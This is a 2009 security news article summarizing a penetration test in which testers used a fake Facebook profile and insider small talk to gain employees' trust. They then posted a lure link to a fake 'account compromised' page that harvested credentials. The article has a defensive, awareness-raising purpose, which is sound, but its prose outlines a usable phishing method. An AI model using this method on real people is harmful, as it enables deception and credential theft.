Snosoft researchers offer a look at Facebook from a pentesting perspective

by Steve Ragan - Feb 16 2009, 17:23

The Snosoft Research Blog has a great article online that examines what a criminal or pentester would see when looking at social networking, using Facebook as a practical example.

The post centers on the work of Netragard, a company dedicated to a wide range of security auditing, which includes penetration testing, social engineering and computer forensics, and covers just one job where those skills were put to use.

The nature of the Internet, shapeless and, for the most part, anonymous, is one reason why social engineering works so well. The boom in social-networking services only adds to the ease in which criminals and professional pentesters can use social engineering to get the job done.

More often than not, in order to get sensitive information, unrestricted access to a network, or whatever else a criminal wants (pentester too), all one has to do is ask for it. The trick is to make the request appear legitimate, which requires a little information. However, this too is only all-too easy to get with a little research and some conversation.

The Snosoft post deals with the topic of trust. In the case it references, they were hired by a company to test the overall security of the business. They did two things: first they exploited the trust of the employees at the company by using Facebook, then they tested the security and stability of the infrastructure.

Without quoting the entire blog post, a brief overview is that during the job they created a fake Facebook profile, and then joined the company Facebook group. With this fake profile, they gathered various bits of information on the company (simple information gathering). Using the information obtained by various members of the company’s group, they started small conversations with members using their fake profile.

The conversations, mostly small talk with nothing of serious value, were designed to make the fake profile seem trustworthy. The fake profile chatted about things only an “insider” would know. This is where the information gathering helped, because the fake profile knew things no one on the outside would know, thus they are trustworthy.

With trust duly established, the time was right to spring the trap, which consisted of the same type of payload criminals would use, according to the post:

“...a legitimate looking https secured web page that appeared to be a component of our customer's web site. When a victim clicks on the specially crafted link the payload is executed and the fake web page is rendered. In this case our fake web page was an alert that warned users that their accounts may have been compromised and that they should verify their credentials by entering them into the form provided. When the users credentials are entered the form submitted them to http://www.netragard.com and were extracted by an automated tool that we created.”

The fake profile posted a link titled: “Omigawd have you seen this I think we got hacked.” And, almost instantly, people started clicking on it and filling out information. Ironic as it sounds, one of the first sets of credentials that were sent belonged to the person who hired the pentesting crew.

The full post, with more deals, can be viewed by clicking here.

The point of the post on Snosoft, as well as the lesson to be learned, is that companies and individuals need to learn to be more skeptical. Yet, that is easier said than done, because trust takes time. In the Facebook example, the information is there to start a trust relationship online, and criminals will take whatever time is needed to reach their end goal.

Sometimes it takes a week, other times it can take years. The result is the same, information that you post online can be used against you or your company to some degree.

The blog post is great, and highly recommended reading.

Around the Web